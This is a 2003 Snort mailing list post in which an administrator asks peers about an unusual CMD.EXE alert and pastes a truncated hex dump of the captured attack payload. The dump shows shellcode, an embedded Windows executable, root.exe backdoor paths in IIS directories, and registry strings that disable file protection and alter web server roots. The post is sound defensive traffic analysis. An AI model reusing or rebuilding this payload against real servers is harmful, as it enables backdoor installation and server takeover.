Snort mailing list archives
different CMD.exe access?!?
From: John Hally <JHally () epnet com>
Date: Tue, 11 Mar 2003 10:58:50 -0500
Hello, This is a different looking trace that tripped on the CMD.EXE rule. I usually see a bunch of ../../../cmd.exe, but this one looks different. Anyone else seeing this? it originated from 219.240.31.44, over in Korea: 000 : 61 6D 65 00 FF 75 BC FF 55 F8 89 45 98 E8 10 00 ame..u..U..E.... 010 : 00 00 57 53 41 47 65 74 4C 61 73 74 45 72 72 6F ..WSAGetLastErro 020 : 72 00 FF 75 BC FF 55 F8 89 45 94 E8 0B 00 00 00 r..u..U..E...... 030 : 55 53 45 52 33 32 2E 44 4C 4C 00 FF 55 F4 89 45 USER32.DLL..U..E 040 : 90 E8 0E 00 00 00 45 78 69 74 57 69 6E 64 6F 77 ......ExitWindow 050 : 73 45 78 00 FF 75 90 FF 55 F8 89 45 8C C3 8B 45 sEx..u..U..E...E 060 : 84 69 C0 05 84 08 08 40 89 45 84 8D 84 04 78 56 .i..... () E xV 070 : 34 12 F7 D8 C1 C0 08 C3 E8 E1 FF FF FF 3C 00 74 4............<.t 080 : F7 3C FF 74 F3 C3 E8 ED FF FF FF 8A F8 E8 E6 FF .<.t............ 090 : FF FF 8A D8 C1 E3 10 E8 DC FF FF FF 8A F8 E8 D5 ................ 0a0 : FF FF FF 8A D8 E8 B4 FF FF FF 83 E0 07 E8 20 00 .............. . 0b0 : 00 00 FF FF FF FF 00 FF FF FF 00 FF FF FF 00 FF ................ 0c0 : FF FF 00 FF FF FF 00 00 FF FF 00 00 FF FF 00 00 ................ 0d0 : FF FF 59 8B 04 81 23 D8 F7 D0 23 85 58 FE FF FF ..Y...#...#.X... 0e0 : 0B D8 80 FB 7F 74 9F 80 FB E0 74 9A 3B 9D 58 FE ....t....t.;.X. 0f0 : FF FF 74 92 C3 68 04 01 00 00 8D 85 5C FE FF FF ..t..h......\... 100 : 50 FF 55 E0 8D BC 05 5C FE FF FF E8 09 00 00 00 P.U....\........ 110 : 5C 43 4D 44 2E 45 58 45 00 5E FC A5 A5 A4 B3 63 \CMD.EXE.^.....c 120 : 6A 01 E8 1C 00 00 00 64 3A 5C 69 6E 65 74 70 75 j......d:\inetpu 130 : 62 5C 73 63 72 69 70 74 73 5C 72 6F 6F 74 2E 65 b\scripts\root.e 140 : 78 65 00 8B 0C 24 88 19 8D 85 5C FE FF FF 50 FF xe...$....\...P. 150 : 55 DC 6A 01 E8 2B 00 00 00 64 3A 5C 70 72 6F 67 U.j..+...d:\prog 160 : 72 61 7E 31 5C 63 6F 6D 6D 6F 6E 7E 31 5C 73 79 ra~1\common~1\sy 170 : 73 74 65 6D 5C 4D 53 41 44 43 5C 72 6F 6F 74 2E stem\MSADC\root. 180 : 65 78 65 00 8B 0C 24 88 19 8D 85 5C FE FF FF 50 exe...$....\...P 190 : FF 55 DC E8 BA 05 00 00 FC 4D 5A 50 00 02 00 00 .U.......MZP.... 1a0 : 00 04 00 0F 00 FF FF 00 00 B8 00 00 00 00 00 00 ................ 1b0 : 00 40 00 1A FC 00 00 01 FC FC FC FC FC FC 00 00 .@.............. 1c0 : 50 45 00 00 4C 01 03 00 FD 2A 25 29 00 00 00 00 PE..L....*%).... 1d0 : 00 00 00 00 E0 00 8F 81 0B 01 02 19 00 04 00 00 ................ 1e0 : 00 08 00 00 00 00 00 00 00 10 00 00 00 10 00 00 ................ 1f0 : 00 20 00 00 00 00 40 00 00 10 00 00 00 04 00 00 . ....@......... 200 : 01 00 00 00 00 00 00 00 03 00 0A 00 00 00 00 00 ................ 210 : 00 40 00 00 00 04 00 00 00 00 00 00 02 00 00 00 .@.............. 220 : 00 00 10 00 00 20 00 00 00 00 10 00 00 10 00 00 ..... .......... 230 : 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ................ 240 : 00 30 00 00 0C 01 FC FC FC 00 00 00 00 00 00 00 .0.............. 250 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 260 : 00 00 00 00 10 00 00 00 10 00 00 00 04 00 00 00 ................ 270 : 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ............... 280 : 00 00 60 00 00 00 00 00 00 00 00 00 10 00 00 00 ..`............. 290 : 20 00 00 00 04 00 00 00 0C 00 00 00 00 00 00 00 ............... 2a0 : 00 00 00 00 00 00 00 40 00 00 C0 00 00 00 00 00 .......@........ 2b0 : 00 00 00 00 10 00 00 00 30 00 00 00 04 00 00 00 ........0....... 2c0 : 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 ...............@ 2d0 : 00 00 C0 FC FC FC FC FC FC FC FC FC FC FC FC FC ................ 2e0 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ 2f0 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC 00 ................ 300 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 ...............h 310 : 04 01 00 00 68 D0 20 40 00 E8 61 01 00 00 8D B8 ....h. @..a..... 320 : D0 20 40 00 BE 00 20 40 00 A5 A5 A5 A5 6A 01 68 . @... @.....j.h 330 : D0 20 40 00 E8 4C 01 00 00 E8 0C 00 00 00 68 C0 . @..L........h. 340 : 27 09 00 E8 31 01 00 00 EB EF 68 D8 24 40 00 68 '...1.....h.$@.h 350 : 3F 00 0F 00 6A 00 68 10 20 40 00 68 02 00 00 80 ?...j.h. @.h.... 360 : E8 32 01 00 00 0B C0 75 26 6A 04 68 54 20 40 00 .2.....u&j.hT @. 370 : 6A 04 6A 00 68 48 20 40 00 FF 35 D8 24 40 00 E8 j.j.hH @..5.$@.. 380 : 0D 01 00 00 FF 35 D8 24 40 00 E8 0E 01 00 00 68 .....5.$@......h 390 : D8 24 40 00 68 3F 00 0F 00 6A 00 68 58 20 40 00 .$@.h?...j.hX @. 3a0 : 68 02 00 00 80 E8 ED 00 00 00 0B C0 75 55 BD 9C h...........uU.. 3b0 : 20 40 00 E8 4C 00 00 00 BD A8 20 40 00 E8 42 00 @..L..... @..B. 3c0 : 00 00 6A 09 68 B8 20 40 00 6A 01 6A 00 68 B0 20 ..j.h. @.j.j.h. 3d0 : 40 00 FF 35 D8 24 40 00 E8 B4 00 00 00 6A 09 68 @..5.$@......j.h 3e0 : C4 20 40 00 6A 01 6A 00 68 B4 20 40 00 FF 35 D8 . @.j.j.h. @..5. 3f0 : 24 40 00 E8 99 00 00 00 FF 35 D8 24 40 00 E8 9A $@.......5.$@... 400 : 00 00 00 C3 C7 05 D0 24 40 00 00 04 00 00 68 D0 .......$@.....h. 410 : 24 40 00 68 D0 20 40 00 68 D4 24 40 00 6A 00 55 $@.h. @.h.$@.j.U 420 : FF 35 D8 24 40 00 E8 60 00 00 00 0B C0 75 49 A1 .5.$@..`.....uI. 430 : D0 24 40 00 0B C0 74 40 BE D0 20 40 00 80 3E 00 .$@...t@.. @..>. 440 : 74 36 46 66 81 7E FE 2C 2C 75 F2 C7 06 32 31 37 t6Ff.~.,,u...217 450 : 00 81 EE CC 20 40 00 89 35 D0 24 40 00 FF 35 D0 .... @..5.$@..5. 460 : 24 40 00 68 D0 20 40 00 6A 01 6A 00 55 FF 35 D8 $@.h. @.j.j.U.5. 470 : 24 40 00 E8 19 00 00 00 C3 FF 25 60 30 40 00 FF $@........%`0@.. 480 : 25 64 30 40 00 FF 25 68 30 40 00 FF 25 70 30 40 %d0@..%h0@..%p0@ 490 : 00 FF 25 74 30 40 00 FF 25 78 30 40 00 FF 25 7C ..%t0@..%x0@..%| 4a0 : 30 40 FC FC FC FC FC FC FC FC FC FC FC FC FC FC 0@.............. 4b0 : FC FC FC FC FC 00 00 00 00 00 00 00 00 00 00 00 ................ 4c0 : 00 00 5C 45 58 50 4C 4F 52 45 52 2E 45 58 45 00 ..\EXPLORER.EXE. 4d0 : 00 00 53 4F 46 54 57 41 52 45 5C 4D 69 63 72 6F ..SOFTWARE\Micro 4e0 : 73 6F 66 74 5C 57 69 6E 64 6F 77 73 20 4E 54 5C soft\Windows NT\ 4f0 : 43 75 72 72 65 6E 74 56 65 72 73 69 6F 6E 5C 57 CurrentVersion\W 500 : 69 6E 6C 6F 67 6F 6E 00 00 00 53 46 43 44 69 73 inlogon...SFCDis 510 : 61 62 6C 65 00 00 9D FF FF FF 53 59 53 54 45 4D able......SYSTEM 520 : 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 \CurrentControlS 530 : 65 74 5C 53 65 72 76 69 63 65 73 5C 57 33 53 56 et\Services\W3SV 540 : 43 5C 50 61 72 61 6D 65 74 65 72 73 5C 56 69 72 C\Parameters\Vir 550 : 74 75 61 6C 20 52 6F 6F tual Roo ------------------------------------------------------- This SF.net email is sponsored by:Crypto Challenge is now open! Get cracking and register here for some mind boggling fun and the chance of winning an Apple iPod: http://ads.sourceforge.net/cgi-bin/redirect.pl?thaw0031en _______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net Go to this URL to change user options or unsubscribe: https://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://www.geocrawler.com/redir-sf.php3?list=snort-users
Current thread:
- different CMD.exe access?!? John Hally (Mar 11)
- Re: different CMD.exe access?!? Bamm Visscher (Mar 11)
- Re: different CMD.exe access?!? Jason (Mar 14)
- Re: different CMD.exe access?!? Phil Wood (Mar 11)
- Re: different CMD.exe access?!? Paul Schmehl (Mar 11)
- <Possible follow-ups>
- RE: different CMD.exe access?!? L. Christopher Luther (Mar 11)
- RE: different CMD.exe access?!? Ricardo, Gerson (Mar 14)
- Re: different CMD.exe access?!? Bamm Visscher (Mar 11)